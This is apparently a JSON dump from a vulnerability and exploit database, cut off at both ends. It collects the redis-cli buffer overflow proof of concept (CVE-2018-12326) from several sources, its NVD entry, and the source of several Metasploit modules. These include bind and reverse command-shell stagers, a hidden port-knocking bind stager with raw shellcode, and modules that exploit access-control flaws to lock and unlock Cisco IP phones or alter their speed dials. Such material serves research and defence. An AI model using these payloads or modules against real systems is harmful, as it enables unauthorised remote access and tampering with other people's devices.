/home/user/redis/src/redis-cli.c:1624:5\r\n#3 0x55ba77 in main /home/user/redis/src/redis-cli.c:6660:9\r\n#4 0x7f6be5f6e82f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291\r\n#5 0x4247a8 in _start (/home/user/redis/src/redis-cli+0x4247a8)\n\n# 0day.today [2018-06-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30598"}], "exploitdb": [{"lastseen": "2018-06-18T20:26:52", "bulletinFamily": "exploit", "description": "Redis-cli < 5.0 - Buffer Overflow (PoC). CVE-2018-12326. Local exploit for Linux platform", "modified": "2018-06-18T00:00:00", "published": "2018-06-18T00:00:00", "id": "EDB-ID:44904", "href": "https://www.exploit-db.com/exploits/44904/", "type": "exploitdb", "title": "Redis-cli < 5.0 - Buffer Overflow (PoC)", "sourceData": "# Exploit Title: Redis-cli < 5.0 - Buffer Overflow (PoC)\r\n# Date: 2018-06-13\r\n# Exploit Author: Fakhri Zulkifli\r\n# Vendor Homepage: https://redis.io/\r\n# Software Link: https://redis.io/download\r\n# Version: 5.0, 4.0, 3.2\r\n# Fixed on: 5.0, 4.0, 3.2\r\n# CVE : CVE-2018-12326\r\n\r\n# Buffer overflow in redis-cli of Redis version 3.2, 4.0, and 5.0 allows a local attacker\r\n# to achieve code execution and escalate to higher privileges via a long string in the hostname parameter.\r\n\r\n$ ./src/redis-cli -h `python -c 'print \"A\" * 300'`\r\nCould not connect to Redis at AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:6379: Name or service not known\r\n\r\n#0 0x4a4182 in vsnprintf /home/user/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1566\r\n#1 0x4a42d0 in snprintf 
/home/user/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1637\r\n#2 0x570159 in repl /home/user/redis/src/redis-cli.c:1624:5\r\n#3 0x55ba77 in main /home/user/redis/src/redis-cli.c:6660:9\r\n#4 0x7f6be5f6e82f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291\r\n#5 0x4247a8 in _start (/home/user/redis/src/redis-cli+0x4247a8)", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/44904/"}], "packetstorm": [{"lastseen": "2018-06-19T02:07:57", "bulletinFamily": "exploit", "description": "", "modified": "2018-06-18T00:00:00", "published": "2018-06-18T00:00:00", "id": "PACKETSTORM:148225", "href": "https://packetstormsecurity.com/files/148225/Redis-cli-Buffer-Overflow.html", "title": "Redis-cli Buffer Overflow", "type": "packetstorm", "sourceData": "`# Exploit Title: Redis-cli < 5.0 - Buffer Overflow (PoC) \n# Date: 2018-06-13 \n# Exploit Author: Fakhri Zulkifli \n# Vendor Homepage: https://redis.io/ \n# Software Link: https://redis.io/download \n# Version: 5.0, 4.0, 3.2 \n# Fixed on: 5.0, 4.0, 3.2 \n# CVE : CVE-2018-12326 \n \n# Buffer overflow in redis-cli of Redis version 3.2, 4.0, and 5.0 allows a local attacker \n# to achieve code execution and escalate to higher privileges via a long string in the hostname parameter. 
\n \n$ ./src/redis-cli -h `python -c 'print \"A\" * 300'` \nCould not connect to Redis at AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:6379: Name or service not known \n \n#0 0x4a4182 in vsnprintf /home/user/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1566 \n#1 0x4a42d0 in snprintf /home/user/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1637 \n#2 0x570159 in repl /home/user/redis/src/redis-cli.c:1624:5 \n#3 0x55ba77 in main /home/user/redis/src/redis-cli.c:6660:9 \n#4 0x7f6be5f6e82f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291 \n#5 0x4247a8 in _start (/home/user/redis/src/redis-cli+0x4247a8) \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/148225/rediscli-overflow.txt"}], "cve": [{"lastseen": "2019-07-26T11:38:47", "bulletinFamily": "NVD", "description": "Buffer overflow in redis-cli of Redis before 4.0.10 and 5.x before 5.0 RC3 allows an attacker to achieve code execution and escalate to higher privileges via a crafted command line. NOTE: It is unclear whether there are any common situations in which redis-cli is used with, for example, a -h (aka hostname) argument from an untrusted source.", "modified": "2019-01-17T11:29:00", "id": "CVE-2018-12326", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-12326", "published": "2018-06-17T14:29:00", "title": "CVE-2018-12326", "type": "cve", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2019-11-25T21:40:31", "bulletinFamily": "exploit", "description": "Spawn a piped command shell (Windows x64) (staged). 
Listen for a pipe connection (Windows x64)\n", "modified": "2018-02-15T23:37:33", "published": "2018-02-12T01:56:50", "id": "MSF:PAYLOAD/WINDOWS/X64/SHELL/BIND_NAMED_PIPE", "href": "", "type": "metasploit", "title": "Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/bind_named_pipe'\nrequire 'msf/core/payload/windows/x64/bind_named_pipe'\n\nmodule MetasploitModule\n\n CachedSize = 481\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::BindNamedPipe_x64\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Windows x64 Bind Named Pipe Stager',\n 'Description' => 'Listen for a pipe connection (Windows x64)',\n 'Author' => [ 'UserExistsError' ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Handler' => Msf::Handler::BindNamedPipe,\n 'Convention' => 'sockrdi', # hPipe\n 'Stager' => { 'RequiresMidstager' => false }\n ))\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/x64/bind_named_pipe.rb"}, {"lastseen": "2019-12-03T04:59:04", "bulletinFamily": "exploit", "description": "This module allows an unauthenticated attacker to exercise the \"Lock\" and \"Unlock\" functionality of Telisca IPS Lock for Cisco IP Phones. This module should be run in the VoIP VLAN, and requires knowledge of the target phone's name (for example, SEP002497AB1D4B). Set ACTION to either LOCK or UNLOCK. 
UNLOCK is the default.\n", "modified": "2017-07-24T13:26:21", "published": "2016-01-15T01:45:00", "id": "MSF:AUXILIARY/VOIP/TELISCA_IPS_LOCK_CONTROL", "href": "", "type": "metasploit", "title": "Telisca IPS Lock Cisco IP Phone Control", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Telisca IPS Lock Cisco IP Phone Control',\n 'Description' => %q{\n This module allows an unauthenticated attacker to exercise the\n \"Lock\" and \"Unlock\" functionality of Telisca IPS Lock for Cisco IP\n Phones. This module should be run in the VoIP VLAN, and requires\n knowledge of the target phone's name (for example, SEP002497AB1D4B).\n\n Set ACTION to either LOCK or UNLOCK. UNLOCK is the default.\n },\n 'References' =>\n [\n # Publicly disclosed via Metaploit PR\n 'URL', 'https://github.com/rapid7/metasploit-framework/pull/6470'\n ],\n 'Author' =>\n [\n 'Fakhir Karim Reda <karim.fakhir[at]gmail.com>',\n 'zirsalem'\n ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => 'Dec 17 2015',\n 'Actions' =>\n [\n ['LOCK', 'Description' => 'To lock a phone'],\n ['UNLOCK', 'Description' => 'To unlock a phone']\n ],\n 'DefaultAction' => 'UNLOCK'\n ))\n\n register_options(\n [\n OptAddress.new('RHOST', [true, 'The IPS Lock IP Address']),\n OptString.new('PHONENAME', [true, 'The name of the target phone'])\n ])\n\n end\n\n def print_status(msg='')\n super(\"#{peer} - #{msg}\")\n end\n\n def print_good(msg='')\n super(\"#{peer} - #{msg}\")\n end\n\n def print_error(msg='')\n super(\"#{peer} - #{msg}\")\n end\n\n # Returns the status of the listening port.\n #\n # @return [Boolean] TrueClass if port open, otherwise FalseClass.\n def port_open?\n begin\n res = send_request_raw({'method' => 'GET', 'uri' => '/'})\n return true if res\n rescue 
::Rex::ConnectionRefused\n vprint_status(\"Connection refused\")\n rescue ::Rex::ConnectionError\n vprint_error(\"Connection failed\")\n rescue ::OpenSSL::SSL::SSLError\n vprint_error(\"SSL/TLS connection error\")\n end\n\n false\n end\n\n # Locks a device.\n #\n # @param phone_name [String] Name of the phone used for the pn parameter.\n #\n # @return [void]\n def lock(phone_name)\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => '/IPSPCFG/user/Default.aspx',\n 'headers' => {\n 'Connection' => 'keep-alive',\n 'Accept-Language' => 'en-US,en;q=0.5'\n },\n 'vars_get' => {\n 'action' => 'DO',\n 'tg' => 'L',\n 'pn' => phone_name,\n 'dp' => '',\n 'gr' => '',\n 'gl' => ''\n }\n })\n\n if res && res.code == 200\n if res.body.include?('Unlock') || res.body.include?('U7LCK')\n print_good(\"The device #{phone_name} is already locked\")\n elsif res.body.include?('unlocked') || res.body.include?('Locking') || res.body.include?('QUIT')\n print_good(\"Device #{phone_name} successfully locked\")\n end\n elsif res\n print_error(\"Unexpected response #{res.code}\")\n else\n print_error('The connection timed out while trying to lock.')\n end\n end\n\n\n # Unlocks a phone.\n #\n # @param phone_name [String] Name of the phone used for the pn parameter.\n #\n # @return [void]\n def unlock(phone_name)\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => '/IPSPCFG/user/Default.aspx',\n 'headers' => {\n 'Connection' => 'keep-alive',\n 'Accept-Language' => 'en-US,en;q=0.5'\n },\n 'vars_get' => {\n 'action' => 'U7LCK',\n 'pn' => phone_name,\n 'dp' => ''\n }\n })\n\n if res && res.code == 200\n if res.body.include?('Unlock') || res.body.include?('U7LCK')\n print_good(\"The device #{phone_name} is already locked\")\n elsif res.body.include?('unlocked') || res.body.include?('QUIT')\n print_good(\"The device #{phone_name} successfully unlocked\")\n end\n elsif res\n print_error(\"Unexpected response #{res.code}\")\n else\n print_error('The connection timed out while trying to 
unlock')\n end\n end\n\n\n def run\n unless port_open?\n print_error('The web server is unreachable!')\n return\n end\n\n phone_name = datastore['PHONENAME']\n case action.name\n when 'LOCK'\n lock(phone_name)\n when 'UNLOCK'\n unlock(phone_name)\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/voip/telisca_ips_lock_control.rb"}, {"lastseen": "2019-11-24T21:39:01", "bulletinFamily": "exploit", "description": "Spawn a piped command shell (Windows x64) (staged). Listen for an IPv6 connection with UUID Support (Windows x64)\n", "modified": "2017-07-24T13:26:21", "published": "2015-05-25T01:21:28", "id": "MSF:PAYLOAD/WINDOWS/X64/SHELL/BIND_IPV6_TCP_UUID", "href": "", "type": "metasploit", "title": "Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/bind_tcp'\nrequire 'msf/core/payload/windows/x64/bind_tcp'\n\nmodule MetasploitModule\n\n CachedSize = 526\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::BindTcp_x64\n\n def self.handler_type_alias\n \"bind_ipv6_tcp_uuid\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Windows x64 IPv6 Bind TCP Stager with UUID Support',\n 'Description' => 'Listen for an IPv6 connection with UUID Support (Windows x64)',\n 'Author' => [ 'sf', 'OJ Reeves' ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Handler' => Msf::Handler::BindTcp,\n 'Convention' => 'sockrdi',\n 'Stager' => { 'RequiresMidstager' => false }\n ))\n end\n\n def use_ipv6\n true\n end\n\n def include_send_uuid\n true\n end\nend\n\n\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": 
"https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb"}, {"lastseen": "2019-11-28T12:06:16", "bulletinFamily": "exploit", "description": "Spawn a piped command shell (staged). Listen for an IPv6 connection with UUID Support (Windows x86)\n", "modified": "2017-07-24T13:26:21", "published": "2015-05-25T01:21:28", "id": "MSF:PAYLOAD/WINDOWS/SHELL/BIND_IPV6_TCP_UUID", "href": "", "type": "metasploit", "title": "Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/bind_tcp'\nrequire 'msf/core/payload/windows/bind_tcp'\n\nmodule MetasploitModule\n\n CachedSize = 318\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::BindTcp\n\n def self.handler_type_alias\n \"bind_ipv6_tcp_uuid\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Bind IPv6 TCP Stager with UUID Support (Windows x86)',\n 'Description' => 'Listen for an IPv6 connection with UUID Support (Windows x86)',\n 'Author' => [ 'hdm', 'skape', 'sf', 'OJ Reeves' ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::BindTcp,\n 'Convention' => 'sockedi',\n 'Stager' => { 'RequiresMidstager' => false }\n ))\n end\n\n def use_ipv6\n true\n end\n\n def include_send_uuid\n true\n end\nend\n\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb"}, {"lastseen": "2019-10-09T00:05:02", "bulletinFamily": "exploit", "description": "Spawn a command shell (staged). 
Listen for an IPv6 connection with UUID Support (Linux x86)\n", "modified": "2017-07-24T13:26:21", "published": "2015-05-18T11:19:04", "id": "MSF:PAYLOAD/LINUX/X86/SHELL/BIND_IPV6_TCP_UUID", "href": "", "type": "metasploit", "title": "Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/bind_tcp'\nrequire 'msf/core/payload/linux/bind_tcp'\n\nmodule MetasploitModule\n\n CachedSize = 165\n\n include Msf::Payload::Stager\n include Msf::Payload::Linux::BindTcp\n\n def self.handler_type_alias\n 'bind_ipv6_tcp_uuid'\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Bind IPv6 TCP Stager with UUID Support (Linux x86)',\n 'Description' => 'Listen for an IPv6 connection with UUID Support (Linux x86)',\n 'Author' => [ 'kris katterjohn', 'egypt', 'OJ Reeves' ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'linux',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::BindTcp,\n 'Convention' => 'sockedi',\n 'Stager' => { 'RequiresMidstager' => true }\n ))\n end\n\n def use_ipv6\n true\n end\n\n def include_send_uuid\n true\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb"}, {"lastseen": "2019-11-17T09:19:38", "bulletinFamily": "exploit", "description": "Spawn a piped command shell (staged). 
Connect back to the attacker with UUID Support\n", "modified": "2018-02-15T21:10:26", "published": "2015-05-15T02:27:25", "id": "MSF:PAYLOAD/WINDOWS/SHELL/REVERSE_TCP_UUID", "href": "", "type": "metasploit", "title": "Windows Command Shell, Reverse TCP Stager with UUID Support", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp'\n\nmodule MetasploitModule\n\n CachedSize = 316\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcp\n\n def self.handler_type_alias\n 'reverse_tcp_uuid'\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager with UUID Support',\n 'Description' => 'Connect back to the attacker with UUID Support',\n 'Author' => [ 'hdm', 'OJ Reeves' ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' => { 'RequiresMidstager' => false }\n ))\n end\n\n #\n # Override the uuid function and opt-in for sending the\n # UUID in the stage.\n #\n def include_send_uuid\n true\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_uuid.rb"}, {"lastseen": "2019-12-03T20:35:13", "bulletinFamily": "exploit", "description": "The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager (CDM), before version 10, doesn't implement access control properly, which allows remote attackers to modify user information. 
This module exploits the vulnerability to make unauthorized speed dial entity manipulations.\n", "modified": "2017-08-29T00:17:58", "published": "2015-01-10T06:29:28", "id": "MSF:AUXILIARY/VOIP/CISCO_CUCDM_SPEED_DIALS", "href": "", "type": "metasploit", "title": "Viproy CUCDM IP Phone XML Services - Speed Dial Attack Tool", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rexml/document'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Viproy CUCDM IP Phone XML Services - Speed Dial Attack Tool',\n 'Description' => %q{\n The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager\n (CDM), before version 10, doesn't implement access control properly, which allows remote\n attackers to modify user information. This module exploits the vulnerability to make\n unauthorized speed dial entity manipulations.\n },\n 'Author' => 'fozavci',\n 'References' =>\n [\n ['CVE', '2014-3300'],\n ['BID', '68331']\n ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'List', { 'Description' => 'Getting the speeddials for the MAC address' } ],\n [ 'Modify', { 'Description' => 'Modifying a speeddial for the MAC address' } ],\n [ 'Add', { 'Description' => 'Adding a speeddial for the MAC address' } ],\n [ 'Delete', { 'Description' => 'Deleting a speeddial for the MAC address' } ]\n ],\n 'DefaultAction' => 'List'\n ))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']),\n OptString.new('MAC', [ true, 'MAC Address of target phone', '000000000000']),\n OptString.new('NAME', [ false, 'Name for Speed Dial', 'viproy']),\n OptString.new('POSITION', [ false, 'Position for Speed Dial', '1']),\n OptString.new('TELNO', [ false, 'Phone number for Speed Dial', '007']),\n ])\n end\n\n def run\n\n case 
action.name.upcase\n when 'MODIFY'\n modify\n when 'DELETE'\n delete\n when 'ADD'\n add\n when 'LIST'\n list\n end\n\n end\n\n def send_rcv(uri, vars_get)\n uri = normalize_uri(target_uri.to_s, uri.to_s)\n res = send_request_cgi(\n {\n 'uri' => uri,\n 'method' => 'GET',\n 'vars_get' => vars_get\n })\n\n if res && res.code == 200 && res.body && res.body.to_s =~ /Speed [D|d]ial/\n return Exploit::CheckCode::Vulnerable, res\n else\n print_error(\"Target appears not vulnerable!\")\n return Exploit::CheckCode::Safe, res\n end\n end\n\n def parse(res)\n doc = REXML::Document.new(res.body)\n names = []\n phones = []\n\n list = doc.root.get_elements('DirectoryEntry')\n list.each do |lst|\n xlist = lst.get_elements('Name')\n xlist.each {|l| names << \"#{l[0]}\"}\n xlist = lst.get_elements('Telephone')\n xlist.each {|l| phones << \"#{l[0]}\" }\n end\n\n if names.size > 0\n names.size.times do |i|\n info = ''\n info << \"Position: #{names[i].split(\":\")[0]}, \"\n info << \"Name: #{names[i].split(\":\")[1]}, \"\n info << \"Telephone: #{phones[i]}\"\n\n print_good(\"#{info}\")\n end\n else\n print_status(\"No Speed Dial detected\")\n end\n end\n\n def list\n mac = datastore['MAC']\n\n print_status(\"Getting Speed Dials of the IP phone\")\n vars_get = {\n 'device' => \"SEP#{mac}\"\n }\n\n status, res = send_rcv('speeddials.cgi', vars_get)\n parse(res) unless status == Exploit::CheckCode::Safe\n end\n\n def add\n mac = datastore['MAC']\n name = datastore['NAME']\n position = datastore['POSITION']\n telno = datastore['TELNO']\n\n print_status(\"Adding Speed Dial to the IP phone\")\n vars_get = {\n 'name' => \"#{name}\",\n 'telno' => \"#{telno}\",\n 'device' => \"SEP#{mac}\",\n 'entry' => \"#{position}\",\n 'mac' => \"#{mac}\"\n }\n status, res = send_rcv('phonespeedialadd.cgi', vars_get)\n\n if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Added/\n print_good(\"Speed Dial #{position} is added successfully\")\n elsif res && res.body && 
res.body.to_s =~ /exist/\n print_error(\"Speed Dial is exist, change the position or choose modify!\")\n else\n print_error(\"Speed Dial couldn't add!\")\n end\n end\n\n def delete\n mac = datastore['MAC']\n position = datastore['POSITION']\n\n print_status(\"Deleting Speed Dial of the IP phone\")\n\n vars_get = {\n 'entry' => \"#{position}\",\n 'device' => \"SEP#{mac}\"\n }\n\n status, res = send_rcv('phonespeeddialdelete.cgi', vars_get)\n\n if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Deleted/\n print_good(\"Speed Dial #{position} is deleted successfully\")\n else\n print_error(\"Speed Dial is not found!\")\n end\n end\n\n def modify\n mac = datastore['MAC']\n name = datastore['NAME']\n position = datastore['POSITION']\n telno = datastore['TELNO']\n\n print_status(\"Deleting Speed Dial of the IP phone\")\n\n vars_get = {\n 'entry' => \"#{position}\",\n 'device' => \"SEP#{mac}\"\n }\n\n status, res = send_rcv('phonespeeddialdelete.cgi', vars_get)\n\n if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Deleted/\n print_good(\"Speed Dial #{position} is deleted successfully\")\n print_status(\"Adding Speed Dial to the IP phone\")\n\n vars_get = {\n 'name' => \"#{name}\",\n 'telno' => \"#{telno}\",\n 'device' => \"SEP#{mac}\",\n 'entry' => \"#{position}\",\n 'mac' => \"#{mac}\"\n }\n\n status, res = send_rcv('phonespeedialadd.cgi', vars_get)\n\n if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Added/\n print_good(\"Speed Dial #{position} is added successfully\")\n elsif res && res.body =~ /exist/\n print_error(\"Speed Dial is exist, change the position or choose modify!\")\n else\n print_error(\"Speed Dial couldn't add!\")\n end\n else\n print_error(\"Speed Dial is not found!\")\n end\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": 
"https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/voip/cisco_cucdm_speed_dials.rb"}, {"lastseen": "2019-12-01T18:24:35", "bulletinFamily": "exploit", "description": "Spawn a piped command shell (staged). Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). After that you could get your shellcode from any IP. The socket will appear as \"closed,\" thus helping to hide the shellcode\n", "modified": "2017-07-24T13:26:21", "published": "2014-12-27T21:03:45", "id": "MSF:PAYLOAD/WINDOWS/SHELL/BIND_HIDDEN_IPKNOCK_TCP", "href": "", "type": "metasploit", "title": "Windows Command Shell, Hidden Bind Ipknock TCP Stager", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/bind_tcp'\n\n\nmodule MetasploitModule\n\n CachedSize = 359\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows\n\n\n def self.handler_type_alias\n \"bind_hidden_ipknock_tcp\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Hidden Bind Ipknock TCP Stager',\n 'Description' => 'Listen for a connection. First, the port will need to be knocked from\n the IP defined in KHOST. This IP will work as an authentication method\n (you can spoof it with tools like hping). After that you could get your\n shellcode from any IP. 
The socket will appear as \"closed,\" thus helping to\n hide the shellcode',\n 'Author' =>\n [\n 'hdm', # original payload module (stager bind_tcp)\n 'skape', # original payload module (stager bind_tcp)\n 'sf', # original payload module (stager bind_tcp)\n 'Borja Merino <bmerinofe[at]gmail.com>' # Add Hidden Ipknock functionality\n ],\n 'License' => MSF_LICENSE,\n 'References' => ['URL', 'http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html'],\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::BindTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n {\n 'RequiresMidstager' => false,\n 'Offsets' =>\n {\n 'LPORT' => [ 193, 'n' ],\n 'KHOST' => [ 255, 'ADDR' ]\n },\n 'Payload' =>\n # Length: 359 bytes\n \"\\xfc\\xe8\\x82\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xc0\\x64\\x8b\\x50\\x30\\x8b\" +\n \"\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\\x4a\\x26\\x31\\xff\\xac\\x3c\" +\n \"\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\\x0d\\x01\\xc7\\xe2\\xf2\\x52\\x57\\x8b\\x52\" +\n \"\\x10\\x8b\\x4a\\x3c\\x8b\\x4c\\x11\\x78\\xe3\\x48\\x01\\xd1\\x51\\x8b\\x59\\x20\" +\n \"\\x01\\xd3\\x8b\\x49\\x18\\xe3\\x3a\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\\xff\\xac\" +\n \"\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf6\\x03\\x7d\\xf8\\x3b\\x7d\\x24\\x75\" +\n \"\\xe4\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\" +\n \"\\x8b\\x04\\x8b\\x01\\xd0\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\" +\n \"\\xe0\\x5f\\x5f\\x5a\\x8b\\x12\\xeb\\x8d\\x5d\\x68\\x33\\x32\\x00\\x00\\x68\\x77\" +\n \"\\x73\\x32\\x5f\\x54\\x68\\x4c\\x77\\x26\\x07\\xff\\xd5\\xb8\\x90\\x01\\x00\\x00\" +\n \"\\x29\\xc4\\x54\\x50\\x68\\x29\\x80\\x6b\\x00\\xff\\xd5\\x50\\x50\\x50\\x50\\x40\" +\n \"\\x50\\x40\\x50\\x68\\xea\\x0f\\xdf\\xe0\\xff\\xd5\\x97\\x31\\xdb\\x53\\x68\\x02\" +\n \"\\x00\\x11\\x5c\\x89\\xe6\\x6a\\x10\\x56\\x57\\x68\\xc2\\xdb\\x37\\x67\\xff\\xd5\" +\n \"\\x6a\\x01\\x54\\x68\\x02\\x30\\x00\\x00\\x68\\xff\\xff\\x00\\x00\\x57\\x68\\xf1\" +\n 
